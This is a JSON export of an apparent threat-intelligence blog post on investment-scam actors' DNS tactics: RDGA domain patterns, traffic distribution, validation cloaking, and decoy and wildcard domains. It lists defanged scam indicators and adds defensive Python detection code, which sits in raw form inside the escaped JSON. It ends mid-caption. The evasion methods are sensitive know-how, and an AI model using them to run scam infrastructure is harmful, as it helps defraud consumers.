{"id":11459,"date":"2025-04-28T11:55:22","date_gmt":"2025-04-28T18:55:22","guid":{"rendered":"https:\/\/blogs.infoblox.com\/?p=11459"},"modified":"2025-04-28T05:48:32","modified_gmt":"2025-04-28T12:48:32","slug":"uncovering-actor-ttp-patterns-and-the-role-of-dns-in-investment-scams","status":"publish","type":"post","link":"https:\/\/www.infoblox.com\/blog\/threat-intelligence\/uncovering-actor-ttp-patterns-and-the-role-of-dns-in-investment-scams\/","title":{"rendered":"Uncovering Actor TTP Patterns and the Role of DNS in Investment Scams"},"content":{"rendered":"<h3>Authors: Darby Wise, Piotr Glaska, Laura da Rocha<\/h3>\n<p>According to the Federal Trade Commission (FTC), consumers lost more money to investment scams than to any other kind of fraud in 2024: reported losses rose 24 percent from 2023 to 2024, to a total of US$5.7 billion<sup>1<\/sup>. These threats take a variety of forms, from the so-called pig butchering scams, which generally start with generic text messages, to ones advertised through social media. Sometimes human interaction is involved and sometimes it is not. We track several investment scam actors and we\u2019ve previously published research on two of them, Savvy Seahorse and Horrid Hawk, who have distinctive DNS fingerprints.<\/p>\n<p>This report expands on our previous publications to consider common tactics, techniques, and procedures (TTPs) of several investment scam actors who lure victims with fake platforms, including crypto exchanges. Fake websites referred to as \u201cprofit platforms\u201d are designed to convince users they are dealing with a legitimate business. 
We\u2019ve found that the actors often:<\/p>\n<ul class=\"list-spacing\">\n<li>Register large numbers of domains algorithmically over time, a technique we refer to as registered domain generation algorithms (RDGAs)<\/li>\n<li>Embed similar web forms to collect user data<\/li>\n<li>Hide their activity through traffic distribution systems (TDS)<\/li>\n<li>Leverage fake news often featuring spoofed government endorsements, a celebrity, or fake first-hand accounts of the investment program<\/li>\n<li>Share website structure indicative of the use of a kit<\/li>\n<\/ul>\n<p>We are often able to discover and track investment scams through DNS fingerprints. Two of the actors detailed in this paper, who we call Reckless Rabbit and Ruthless Rabbit, for example, are tracked through their use of RDGAs.<\/p>\n<p><span class=\"inline-image\"><img decoding=\"async\" style=\"float:left;margin-right: 15px;margin-bottom: 15px;\" width=\"180px\" alt=\"Reckless Rabbit and Ruthless Rabbit\" class=\"blog-image\" src=\"\/wp-content\/uploads\/uncovering-actor-ttp-patterns-and-the-role-of-dns-in-investment-scams-image1.jpg\"><\/p>\n<h3>Embedded Web Forms<\/h3>\n<p>While the actors we investigated may use different means to distribute their campaigns, we found that all of them include, at some stage, an embedded web form, which we identified as the first and most notable TTP pattern. For example, Reckless Rabbit creates ads on Facebook that lead to fake news articles featuring a celebrity endorsement for the investment platform. The article includes a link to the scam platform which contains an embedded web form persuading the user to enter their personal information to \u201cregister\u201d for the investment opportunity.<br \/>\n<\/span><\/p>\n<p>The form typically requires the user\u2019s first and last name, email address, and phone number, which automatically formats the country code to match the user\u2019s IP geolocation. 
Some forms also require the user to create a password and offer the option to auto-generate one for them. Figure 1 below shows an example from a February 2025 scam where we accessed the landing page using a U.S.-based IP address; Figure 2 shows the auto-generated password. The actor uses this information to progress to the next step in the scam\u2014information validation checks.<\/p>\n<p><img decoding=\"async\" class=\"blog-image img-50\" src=\"\/wp-content\/uploads\/uncovering-actor-ttp-patterns-and-the-role-of-dns-in-investment-scams-figure1.png\" alt=\"Figure 1. Example of embedded web form in a February 2025 investment scam\" \/><\/p>\n<p class=\"image-caption\">Figure 1. Example of embedded web form in a February 2025 investment scam<sup>2<\/sup><\/p>\n<p><img decoding=\"async\" class=\"blog-image img-50\" src=\"\/wp-content\/uploads\/uncovering-actor-ttp-patterns-and-the-role-of-dns-in-investment-scams-figure2.png\" alt=\"Figure 2. Embedded web form with an auto-generated password field\" \/><\/p>\n<p class=\"image-caption\">Figure 2. Embedded web form with an auto-generated password field<sup>3<\/sup><\/p>\n<h3>Validation Checks<\/h3>\n<p>Once the user enters their personal details, most of the campaigns conduct validation checks on the user\u2019s information and their IP address. The checks each actor performs can vary, but common ones include:<\/p>\n<ul class=\"list-spacing\">\n<li>Validity of the user&#8217;s email and\/or phone number<\/li>\n<li>Duplication of emails and\/or phone numbers<\/li>\n<li>Multiple attempts to register using the same IP address within a specific timeframe<\/li>\n<li>Missing information (name, phone number, etc.)<\/li>\n<\/ul>\n<p>The scam actors often perform HTTP GET requests to legitimate IP validation tools, such as <span class=\"code-format\">ipinfo[.]io, ipgeolocation[.]io, or ipapi[.]co<\/span>. 
They use these validation checks to filter out traffic from specific countries, security researchers, and\/or bots.<\/p>\n<p>In many campaigns, if a user passes the validation, a TDS routes them either directly to the investment scam platform where they are encouraged to transfer money, or to a page that thanks them for registering and says a representative will contact them with additional information. Some campaigns use call centers to provide the victims with instructions on how to set up an account and transfer money into the fake investment platform. For users who do not pass the validation step, many campaigns will simply display a \u201cthank you\u201d landing page, as shown in Figure 3.<\/p>\n<p><img decoding=\"async\" class=\"blog-image\" src=\"\/wp-content\/uploads\/uncovering-actor-ttp-patterns-and-the-role-of-dns-in-investment-scams-figure3.png\" alt=\"Figure 3. Ruthless Rabbit\u2019s \"thank you\u201d page\" \/><\/p>\n<p class=\"image-caption\">Figure 3. Ruthless Rabbit\u2019s &#8220;thank you\u201d page<sup>4<\/sup><\/p>\n<h3>Traffic Distribution Systems<\/h3>\n<p>Some of the scam actors we\u2019ve researched leverage their own TDSs to collect information about the victim and conditionally make decisions on which web content the user will be redirected to. This is the case for an active crypto scam actor we have been tracking that utilizes a TDS to route users from different countries to different fake investment platforms. Table 1 below shows this actor\u2019s TDS redirections based on the geolocation of the user accessing the crypto scam page <span class=\"code-format\">bitcoin-profit[.]org<\/span>. This threat actor routes users from the United States to the legitimate platform eToro, possibly to evade detection from security researchers.  
<\/p>\n<table border=\"1\">\n<thead>\n<tr>\n<th>IP Geolocation<\/th>\n<th>TDS Domain(s)<\/th>\n<th>Investment Platform Domain<\/th>\n<\/tr>\n<\/thead>\n<tbody>\n<tr>\n<td>Switzerland<sup>5<\/sup><\/td>\n<td class=\"code-format\">mykryplogin[.]com -> murzasanny[.]com<\/td>\n<td class=\"code-format\">trading[.]nexperts[.]pro<\/td>\n<\/tr>\n<tr>\n<td>Canada<sup>6<\/sup><\/td>\n<td class=\"code-format\">powapi[.]net<\/td>\n<td class=\"code-format\">primeassets[.]uk<\/td>\n<\/tr>\n<tr>\n<td>Australia<sup>7<\/sup><\/td>\n<td class=\"code-format\">powapi[.]net -> camersyf[.]com<\/td>\n<td class=\"code-format\">trading[.]xptraders[.]com<\/td>\n<\/tr>\n<tr>\n<td>United States<sup>8<\/sup><\/td>\n<td class=\"code-format\">cryptoveteran[.]care<\/td>\n<td class=\"code-format\">etoro[.]com (legitimate)<\/td>\n<\/tr>\n<tr>\n<td colspan=\"3\">Table 1. TDS and redirection domains for a crypto scam campaign. Users accessing <span class=\"code-format\">bitcoin-profit[.]org<\/span> from Switzerland and Australia redirect to a secondary TDS domain.<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<h3>RDGAs and Dynamic Website Logos<\/h3>\n<p>In a previous blog we published in 2023, we introduced the concept of RDGAs:<\/p>\n<p><em>Registered domain generation algorithms (RDGAs) are a programmatic mechanism that allows actors to create many domain names at once or over time to register for use in their infrastructure. These differ from traditional domain generation algorithms (DGAs) that have long been associated with malware in significant ways. In an RDGA, the algorithm is a secret kept by the actor, and they register all the domain names. In a traditional DGA, the malware contains an algorithm that can be discovered, and most of the domain names will not be registered. 
While DGAs are used exclusively for connection to a malware controller, malicious RDGAs are used for a wide range of malicious activity.<sup>9<\/sup><\/em><\/p>\n<p>Since then, we\u2019ve observed over 3 million RDGA domains on the internet. These domains are commonly used in advertising, so seeing these investment scams intermingled with other product ads makes sense. In the actor-specific sections of this paper below, we will show the distinct RDGA patterns that Reckless and Ruthless Rabbits use to create large sets of domains for their campaigns.<\/p>\n<p>Some actors use dictionary-based RDGAs to generate domain names that match dynamic website names and logos in their scam pages. Each website contains an embedded web form for the user to provide their information. As an example, Figure 4 below shows that the top left corners of the scam websites display the supposed logo of the investment platform\/application, matching the domain name. The different pages displayed in Figure 4 have the same or very similar content, but the logo varies depending on the domain name. 
Scammers use RDGAs to create large sets of domains and, because the page derives its logo text from the domain name, every new domain gets a matching logo automatically, which lets them scale campaigns without editing each site by hand.<\/p>\n<table>\n<tbody>\n<tr>\n<td class=\"code-format\">vasezonix-app[.]trade<br \/>\nvensotixapp-platform[.]store<br \/>\nvasezonixapp[.]guru<br \/>\nvensotixapp[.]click<br \/>\nvenzotexapp[.]cloud<\/td>\n<td><img decoding=\"async\" class=\"blog-image\" src=\"\/wp-content\/uploads\/uncovering-actor-ttp-patterns-and-the-role-of-dns-in-investment-scams-figure4a.png\" alt=\"Figure 4\" \/><\/td>\n<\/tr>\n<tr>\n<td class=\"code-format\">aportunex-app[.]shop<br \/>\naportunex-app[.]trade<br \/>\naportunex-app[.]wiki<br \/>\naportunexapp[.]bond<br \/>\naportunexapp[.]help<br \/>\naportunexapp[.]trade<br \/>\naportunexapp[.]wiki<\/td>\n<td><img decoding=\"async\" class=\"blog-image\" src=\"\/wp-content\/uploads\/uncovering-actor-ttp-patterns-and-the-role-of-dns-in-investment-scams-figure4b.png\" alt=\"Figure 4\" \/><\/td>\n<\/tr>\n<tr>\n<td class=\"code-format\">bitcoin-apex[.]guru<br \/>\nbitcoin-apex[.]help<br \/>\nbitcoin-apex[.]website<br \/>\nbitcoinapex-platform[.]click<br \/>\nbitcoinapex-platform[.]guru<br \/>\nbitcoinapex-platform[.]top<br \/>\nbitcoinapex[.]website<\/td>\n<td><img decoding=\"async\" class=\"blog-image\" src=\"\/wp-content\/uploads\/uncovering-actor-ttp-patterns-and-the-role-of-dns-in-investment-scams-figure4c.png\" alt=\"Figure 4\" \/><\/td>\n<\/tr>\n<tr>\n<td colspan=\"2\">Figure 4: Unnamed investment scam actor using the same logo design, where the name on the logo matches the domain name. 
In this example, the actor creates domains in bulk with the same second-level domain (SLD) label but on several top-level domains (TLDs)<sup>10, <\/sup><sup>11, <\/sup><sup>12<\/sup><\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<p>Other patterns we have seen threat actors use in most of the investment scam campaigns include:<\/p>\n<ul class=\"list-spacing\">\n<li>Distributing scam domains through malicious Facebook ads<\/li>\n<li>Promising high returns if a user inputs a small amount of money during registration<\/li>\n<li>Predominantly targeting users in Eastern European countries, such as Russia, Romania, and Poland<\/li>\n<li>Excluding traffic from certain countries<\/li>\n<\/ul>\n<h3>Investment Threat Actors<\/h3>\n<p>As we mentioned at the beginning of the paper, two of the more notable investment scam actors that we are tracking are Reckless and Ruthless Rabbits. They follow many of the common TTPs we\u2019ve described above, but they also have their own distinguishing characteristics.<\/p>\n<h3>Reckless Rabbit<\/h3>\n<p>Reckless Rabbit lures victims to fake investment platforms through malicious Facebook advertisements. They intersperse them among other content, most commonly items for sale on popular marketplace stores such as Amazon (see Figure 5). 
This technique of burying their investment scam ads among other, seemingly innocuous ads may be a trick they use to avoid policy enforcement from Facebook.<\/p>\n<p><img decoding=\"async\" class=\"blog-image\" src=\"\/wp-content\/uploads\/uncovering-actor-ttp-patterns-and-the-role-of-dns-in-investment-scams-figure5.png\" alt=\"Figure 5: Reckless Rabbit\u2019s Facebook ads for products on Amazon\" \/><\/p>\n<p class=\"image-caption\">Figure 5: Reckless Rabbit\u2019s Facebook ads for products on Amazon<\/p>\n<p>The main scam advertisements take the user to either:<\/p>\n<ul class=\"list-spacing\">\n<li>pages such as a full fake news story, which includes a link to the investment landing page (Figure 6), or<\/li>\n<li>the investment platform itself (Figure 7).<\/li>\n<\/ul>\n<div class=\"img-container\">\n<img decoding=\"async\" src=\"\/wp-content\/uploads\/uncovering-actor-ttp-patterns-and-the-role-of-dns-in-investment-scams-figure6a.png\" alt=\"Figure 6a\"><br \/>\n<img decoding=\"async\" src=\"\/wp-content\/uploads\/uncovering-actor-ttp-patterns-and-the-role-of-dns-in-investment-scams-figure6b.png\" alt=\"Figure 6b\">\n<\/div>\n<p class=\"image-caption\">Figure 6: Website with fake news about a Polish celebrity and the investment scam lure at the end of the article. These are both translated from the original page in Polish. The celebrity\u2019s image and name have been redacted for the purpose of this paper.<\/p>\n<div class=\"img-container\">\n<img decoding=\"async\" src=\"\/wp-content\/uploads\/uncovering-actor-ttp-patterns-and-the-role-of-dns-in-investment-scams-figure7a.png\" alt=\"Figure 7a\"><br \/>\n<img decoding=\"async\" src=\"\/wp-content\/uploads\/uncovering-actor-ttp-patterns-and-the-role-of-dns-in-investment-scams-figure7b.png\" alt=\"Figure 7b\">\n<\/div>\n<p class=\"image-caption\">Figure 7: Reckless Rabbit\u2019s investment scam platform in Norwegian and the translation to English. 
The site contains a web form similar to those used by other investment scam actors<sup>13<\/sup> and a fake endorsement from a Norwegian billionaire businessman.<\/p>\n<p>Reckless Rabbit has been creating domains since as early as April 2024, with new domains created on a near-daily basis. Table 2 shows examples of the two RDGA patterns they use to create these domains. The first concatenates one or two random characters, a three-letter month abbreviation, and a short English word, always in the .info TLD. The second pattern combines two or three English words, which may or may not be separated by dashes; the domains in this group are in the .com and .info TLDs.<\/p>\n<table>\n<thead>\n<tr>\n<th width=\"50%\">Domain Pattern<\/th>\n<th>Examples<\/th>\n<\/tr>\n<\/thead>\n<tbody>\n<tr>\n<td class=\"code-format\">&lt;1-2 random characters&gt;&lt;3 letter month&gt;&lt;short English word&gt;[.]info<\/td>\n<td class=\"code-format\">kc<strong>feb<\/strong>drill[.]info<br \/>\nal<strong>mar<\/strong>silk[.]info<br \/>\ni<strong>apr<\/strong>wall[.]info<br \/>\nw<strong>may<\/strong>curr[.]info<br \/>\nf<strong>jun<\/strong>medi[.]info<br \/>\nf<strong>jul<\/strong>swap[.]info<br \/>\nf<strong>aug<\/strong>swap[.]info<br \/>\ns<strong>sep<\/strong>coin[.]info<br \/>\nk<strong>oct<\/strong>ice[.]info<br \/>\nl<strong>nov<\/strong>chalk[.]info<br \/>\nqp<strong>dec<\/strong>bid[.]info<\/td>\n<\/tr>\n<tr>\n<td class=\"code-format\">&lt;2-3 random English words separated by dashes or not&gt;&#91;.&#93;&lt;com, info&gt;<\/td>\n<td class=\"code-format\">well-groomedcanvas[.]com<br \/>\nupkeep-vocal[.]com<br \/>\nextra-largewrinkles[.]info<br \/>\nport-rusty-time[.]com<br \/>\nlibrary-novel-axe[.]com<br \/>\nacoustic-fund-rate[.]info<br \/>\ntemple-well-known[.]info<br \/>\nroomyspeedboat[.]info<br \/>\nlongmarble[.]info<br \/>\nsixcrowd[.]com<br \/>\nmercifulknife[.]com<\/td>\n<\/tr>\n<tr>\n<td colspan=\"2\">Table 2: Reckless Rabbit\u2019s RDGA domain patterns and examples<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<p>When
the victim accesses the fake news website, the actor collects information about the user, such as IP address and geolocation, to determine the language that will be displayed on the page. They use the metadata as input to make a call to an API endpoint they maintain (<span class=\"code-format\">\/api\/v1\/trigger\/field\/<\/span>) to fetch and display the site content appropriately. Figure 8 shows a code snippet of one of the scripts called in the HTTP request chain and includes the API call.<\/p>\n<p><img decoding=\"async\" class=\"blog-image\" src=\"\/wp-content\/uploads\/uncovering-actor-ttp-patterns-and-the-role-of-dns-in-investment-scams-figure8.png\" alt=\"Figure 8. Code snippet of scripts that make an API call to get the language and the page to which the user will get redirected\" \/><\/p>\n<p class=\"image-caption\">Figure 8. Code snippet of scripts that make an API call to get the language and the page to which the user will get redirected<sup>14, <\/sup><sup>15<\/sup><\/p>\n<p>We&#8217;ve observed instances where Reckless Rabbit uses validation checks to filter out traffic from specific countries, including Afghanistan, Somalia, Liberia, Madagascar, and others. The code snippet in Figure 9 shows the full list of excluded countries. <\/p>\n<p><img decoding=\"async\" class=\"blog-image\" src=\"\/wp-content\/uploads\/uncovering-actor-ttp-patterns-and-the-role-of-dns-in-investment-scams-figure9.png\" alt=\"Figure 9: Code snippet that shows a variable for countries to be excluded\" \/><\/p>\n<p class=\"image-caption\">Figure 9: Code snippet that shows a variable for countries to be excluded<sup>16, <\/sup><sup>17<\/sup><\/p>\n<p>Reckless Rabbit configures wildcard DNS responses to their domains, which means that a query to any subdomain (e.g., <span class=\"code-format\">wildcardbdidbanpdla[.]brilliantwallaby[.]info<\/span>) of their domains will return a response, as shown in Figure 10. 
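A quick way to confirm wildcard behaviour on a suspect domain, and to decide whether the registered domain rather than individual hostnames belongs on a blocklist, is to resolve a few random labels under it. The Python below is an added example, not Infoblox tooling and not taken from the actor: it uses only the standard library resolver, and the `resolve` parameter lets you plug in a recorded or stub resolver for offline work (the addresses in the usage note are illustrative).

```python
"""Probe a registered domain for wildcard DNS and pick a blocking scope.

Added example (not Infoblox tooling). Random labels that no real host would
carry are resolved; if every probe answers, the zone answers for anything,
so only the registered domain is a stable indicator.
"""
import secrets
import socket
from typing import Callable, List, Optional, Sequence

# A resolver maps a hostname to one IPv4 string, or None for NXDOMAIN/error.
Resolver = Callable[[str], Optional[str]]


def stdlib_resolve(name: str) -> Optional[str]:
    """Resolve with the system stub resolver (needs network access)."""
    try:
        return socket.gethostbyname(name)
    except socket.gaierror:
        return None


def random_label(length: int = 16) -> str:
    """A throwaway label such as 'q7f3k9...' that no legitimate host uses."""
    alphabet = "abcdefghijklmnopqrstuvwxyz0123456789"
    return "".join(secrets.choice(alphabet) for _ in range(length))


def is_wildcarded(domain: str, resolve: Resolver = stdlib_resolve,
                  probes: int = 3) -> bool:
    """True when every random probe under `domain` gets an answer.

    Several probes guard against a single label that happens to exist;
    comparing answers for equality is deliberately avoided so that
    round-robin wildcard records are still recognised.
    """
    answers = [resolve(f"{random_label()}.{domain}") for _ in range(probes)]
    return all(a is not None for a in answers)


def blocking_scope(domain: str, observed: Sequence[str],
                   resolve: Resolver = stdlib_resolve) -> List[str]:
    """Indicators worth listing: the registered domain if it is wildcarded
    (any subdomain will answer, so listing hostnames is futile), otherwise
    the hostnames actually observed in the campaign."""
    if is_wildcarded(domain, resolve):
        return [domain]
    return sorted(set(observed))
```

Run `blocking_scope("brilliantwallaby.info", ["wildcardbdidbanpdla.brilliantwallaby.info"])` with network access to see the registered domain come back as the indicator; with a stub resolver that answers `203.0.113.10` for anything under that SLD (a documentation address, not the actor's real hosting) the same decision is reproduced offline.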
Wildcarding generates noise in DNS: a query for any subdomain of that SLD returns a response, so it is hard to separate the subdomains the actor actively uses from random queries triggered by, for example, security researchers. If security tools react by listing only the subdomains confirmed to host malicious content rather than the SLD itself, the actor gets to use the registered domain for longer. <\/p>\n<p><img decoding=\"async\" class=\"blog-image\" src=\"\/wp-content\/uploads\/uncovering-actor-ttp-patterns-and-the-role-of-dns-in-investment-scams-figure10.png\" alt=\"Figure 10. Wildcard response behavior to a random subdomain of an existing Reckless Rabbit domain\" \/><\/p>\n<p class=\"image-caption\">Figure 10. Wildcard response behavior to a random subdomain of an existing Reckless Rabbit domain<\/p>\n<p>Reckless Rabbit uses several additional techniques to avoid detection, including:<\/p>\n<ul class=\"list-spacing\">\n<li>Interspersing ads that redirect to the investment scam between ads for items supposedly being sold on popular marketplaces, such as Amazon (Figure 11)<\/li>\n<li>Adding unrelated images to avoid detection based on image recognition (Figure 12)<\/li>\n<li>Displaying (in the ad) a decoy domain that is different from the domain that the user will be redirected to once they click on the link (Figure 13)<\/li>\n<li>Using a decoy page with non-suspicious content\u2014such as a website for a restaurant\u2014on the SLD, shielding the actual investment scam page hosted on the full URL (Figure 14)<\/li>\n<\/ul>\n<div class=\"grid-container\">\n<div class=\"grid-item\">\n<img decoding=\"async\" src=\"\/wp-content\/uploads\/uncovering-actor-ttp-patterns-and-the-role-of-dns-in-investment-scams-figure11.png\" alt=\"Figure 11. 
Investment scam lure mixed with items being sold in marketplaces\">\n<p class=\"image-caption\">Figure 11. Investment scam lure mixed with items being sold in marketplaces<\/p>\n<\/div>\n<div class=\"grid-item\">\n<img decoding=\"async\" src=\"\/wp-content\/uploads\/uncovering-actor-ttp-patterns-and-the-role-of-dns-in-investment-scams-figure12.png\" alt=\"Figure 12. Technique to prevent detection by image recognition-based security technology\">\n<p class=\"image-caption\">Figure 12. Technique to prevent detection by image recognition-based security technology<\/p>\n<\/div>\n<\/div>\n<div class=\"grid-container\">\n<div class=\"grid-item\">\n<img decoding=\"async\" src=\"\/wp-content\/uploads\/uncovering-actor-ttp-patterns-and-the-role-of-dns-in-investment-scams-figure13.png\" alt=\"Figure 13. Example of Facebook ad caption with decoy domain, amazon[.]pl. The ad redirects to a URL under tyxarai[.]org and is associated with wjulbucks[.]info\">\n<p class=\"image-caption\">Figure 13. Example of Facebook ad caption with decoy domain, <span class=\"code-format\">amazon[.]pl<\/span>. The ad redirects to a URL under <span class=\"code-format\">tyxarai[.]org<\/span> and is associated with <span class=\"code-format\">w<strong>jul<\/strong>bucks[.]info<\/span><sup>18, <\/sup><sup>19<\/sup><\/p>\n<\/div>\n<div class=\"grid-item\">\n<img decoding=\"async\" src=\"\/wp-content\/uploads\/uncovering-actor-ttp-patterns-and-the-role-of-dns-in-investment-scams-figure14.png\" alt=\"Figure 14. Decoy page with non-suspicious content on the SLD\">\n<p class=\"image-caption\">Figure 14. Decoy page with non-suspicious content on the SLD<sup>20<\/sup><\/p>\n<\/div>\n<\/div>\n<h3>Ruthless Rabbit<\/h3>\n<p>Ruthless Rabbit has been running investment scam campaigns since at least November 2022. 
These campaigns follow similar themes to those we have seen from Horrid Hawk and other Russian-hosted scam campaigns that primarily target users in Russia, Poland, Romania, and Kazakhstan, among other countries. Most currently active campaigns are hosted on two dedicated IPs, but the actor has previously used at least eight different IPs hosted with Aeza, as well as a dedicated IP hosted with IROKO. Combined, these IPs host over 2,600 actor-owned domains. They use Namecheap for domain registration, name servers, and mail servers.<\/p>\n<p>In May 2024, Ruthless Rabbit began using a single RDGA pattern to create the large number of domains necessary to operate their scams (see Table 3).<\/p>\n<table>\n<thead>\n<tr>\n<th>Domain Pattern<\/th>\n<th>Examples<\/th>\n<\/tr>\n<\/thead>\n<tbody>\n<tr>\n<td class=\"code-format\">&lt;random English word or 3-7 random characters&gt;&lt;bik, job, mot, lin, tyt, byk, bot, fat, pit, kot, etc.&gt;[.]pro<\/td>\n<td class=\"code-format\">topsmot[.]pro<br \/>\nsitemot[.]pro<br \/>\nviserbik[.]pro<br \/>\ngoaljob[.]pro<br \/>\nsomajob[.]pro<br \/>\nwasakot[.]pro<\/td>\n<\/tr>\n<tr>\n<td colspan=\"2\">Table 3. Ruthless Rabbit RDGA pattern and examples<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<h3>Campaign Themes<\/h3>\n<p>In February 2023, Ruthless Rabbit started hosting Baltic Pipe financial scam pages, a common theme used in investment scams targeting Eastern European users. Over time, they diversified the themes of their landing pages to include scams spoofing WhatsApp, Google Finance, and Meta. The most prevalent campaign theme since May 2024 is a news article spoofing the Russian-language news website \u201cChannel One\u201d that claims users who sign up for the \u201cGazInvest\u201d platform will earn up to 300,000 Russian rubles. 
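With both Rabbits' patterns in hand (Table 2 for Reckless Rabbit, Table 3 for Ruthless Rabbit above), the patterns can be turned into a first-pass classifier to run over passive DNS or newly registered domain feeds. The Python below is an added example, not Infoblox's detection logic: the regular expressions are our transcription of the two tables, the tiny word list is a constructed stand-in for a real English dictionary, and the domains in the usage note come from the indicators listed at the end of this post.

```python
"""First-pass RDGA classifier for the Reckless and Ruthless Rabbit patterns.

Added example: the regexes transcribe Table 2 and Table 3; WORDS is a
constructed stand-in for a real dictionary (a production version would load
one). A benign two-word .com domain also matches the dictionary pattern, so
treat hits as a triage signal to combine with registration age, name
servers and hosting rather than as a verdict.
"""
import re
from collections import defaultdict
from functools import lru_cache
from typing import Dict, Iterable, List, Optional

MONTHS = "jan|feb|mar|apr|may|jun|jul|aug|sep|oct|nov|dec"
# Table 2, pattern 1: <1-2 random chars><3-letter month><short word>.info
RECKLESS_MONTH = re.compile(rf"^[a-z]{{1,2}}({MONTHS})[a-z]{{2,8}}\.info$")
# Table 3: <English word or 3-7 random chars><fixed three-letter suffix>.pro
RUTHLESS_SUFFIX = re.compile(
    r"^[a-z]{3,12}(bik|job|mot|lin|tyt|byk|bot|fat|pit|kot)\.pro$")

# Constructed stand-in dictionary; swap in /usr/share/dict/words or similar.
WORDS = frozenset("""
well groomed canvas upkeep vocal extra large wrinkles port rusty time
library novel axe acoustic fund rate temple known roomy speedboat long
marble six crowd merciful knife bucks swap coin
""".split())


def min_words(label: str, words=WORDS) -> Optional[int]:
    """Fewest dictionary words that concatenate exactly to `label`, or None."""
    @lru_cache(maxsize=None)
    def best(i: int) -> Optional[int]:
        if i == len(label):
            return 0
        options = []
        for j in range(i + 1, len(label) + 1):
            if label[i:j] in words:
                rest = best(j)
                if rest is not None:
                    options.append(1 + rest)
        return min(options) if options else None
    return best(0)


def classify(domain: str) -> Optional[str]:
    """Return the matching actor pattern name, or None."""
    domain = domain.lower().replace("[.]", ".")  # accept defanged input
    if RECKLESS_MONTH.match(domain):
        return "reckless_rabbit_month"
    if RUTHLESS_SUFFIX.match(domain):
        return "ruthless_rabbit"
    sld, _, tld = domain.rpartition(".")
    if tld in {"com", "info"} and sld and re.fullmatch(r"[a-z-]+", sld):
        # Table 2, pattern 2: 2-3 English words, dashes optional.
        counts = [min_words(chunk) for chunk in sld.split("-") if chunk]
        if counts and None not in counts and 2 <= sum(counts) <= 3:
            return "reckless_rabbit_words"
    return None


def scan(domains: Iterable[str]) -> Dict[str, List[str]]:
    """Group domains by pattern; unmatched ones land under 'unclassified'."""
    groups: Dict[str, List[str]] = defaultdict(list)
    for d in domains:
        groups[classify(d) or "unclassified"].append(d)
    return dict(groups)
```

Feeding the indicator table at the end of this post through `scan()` puts `kcfebdrill[.]info` and `wjulbucks[.]info` under `reckless_rabbit_month`, `sixcrowd[.]com` and `well-groomedcanvas[.]com` under `reckless_rabbit_words`, and `brudamot[.]pro` and `easyjob[.]pro` under `ruthless_rabbit`; a `.com` label that the dictionary cannot segment stays unclassified. The month pattern is the most specific of the three, which is why it is tested first.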
This page (see Figure 15) shares the common TTP patterns we mentioned above, including lures of high returns, an embedded web form, and IP geolocation tools for conducting validation checks.<\/p>\n<p><img decoding=\"async\" src=\"\/wp-content\/uploads\/uncovering-actor-ttp-patterns-and-the-role-of-dns-in-investment-scams-figure15.png\" alt=\"Figure 15. Landing page for the Russian GazInvest scam\"><\/p>\n<p class=\"image-caption\">Figure 15. Landing page for the Russian GazInvest scam<sup>21<\/sup><\/p>\n<p>The actor hosts their scam landing pages on specific URL paths that change per campaign theme. As a concealment technique, anyone who requests the SLD alone rather than the full URL\u2014a typical move for security researchers\u2014receives an HTTP 404 Not Found error. Table 4 shows examples of the URL paths for some of the most prevalent campaigns. We\u2019ve broken out the SLDs and the URL paths because the latter are what the actor changes every couple of months.<\/p>\n<table>\n<thead>\n<tr>\n<th>Campaign Theme<\/th>\n<th>SLD<\/th>\n<th>URL Path<\/th>\n<\/tr>\n<\/thead>\n<tbody>\n<tr>\n<td>January 2025 \u2013 GazInvest Platform<sup>22<\/sup><\/td>\n<td class=\"code-format\">brudamot[.]pro<\/td>\n<td class=\"code-format\">\/4YJ3LH?MPC_3=16k3ua14tff7k<\/td>\n<\/tr>\n<tr>\n<td>September 2024 \u2013 GazInvest Platform<sup>23<\/sup><\/td>\n<td class=\"code-format\">dropbik[.]pro<\/td>\n<td class=\"code-format\">\/lander\/gazinvestgaz_4301\/<\/td>\n<\/tr>\n<tr>\n<td>March 2025 \u2013 Spoofed Google Finance Page<sup>24<\/sup><\/td>\n<td class=\"code-format\">easyjob[.]pro<\/td>\n<td class=\"code-format\">\/google_finance_79\/<\/td>\n<\/tr>\n<tr>\n<td>December 2024 \u2013 Fake Russian News Site<sup>25<\/sup><\/td>\n<td class=\"code-format\">kinabik[.]pro<\/td>\n<td class=\"code-format\">\/JF5vNK?MPC_3=2pgkm0e57koso<\/td>\n<\/tr>\n<tr>\n<td colspan=\"3\">Table 4. 
Examples of URL paths for different SLDs and campaigns<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<p>What\u2019s interesting about Ruthless Rabbit is that they operate their own cloaking service to perform validation checks; the cloaking service domain (<span class=\"code-format\">mcraftdb[.]tech<\/span>) hosts publicly available documentation for their API titled \u201cMcraft MediaCraft Tech API.\u201d The documentation (Figure 16) provides insight into some of the actor\u2019s validation checks on \u201cleads,\u201d or users, who enter personal information into the forms embedded in the investment scam pages. The cloaking service looks for users entering duplicate information or attempting to access the investment platform multiple times within the previous 20 minutes using the same IP address. Users who do not pass the checks will be redirected to either a 404 Not Found error page or to another page on the SLD titled <strong>thanks.html<\/strong>, which states someone will contact them for additional information. Figure 17 shows the form script the actor uses for this API call.<\/p>\n<p><img decoding=\"async\" src=\"\/wp-content\/uploads\/uncovering-actor-ttp-patterns-and-the-role-of-dns-in-investment-scams-figure16.jpg\" alt=\"Figure 16. API documentation for the actor\u2019s validation API\"><\/p>\n<p class=\"image-caption\">Figure 16. 
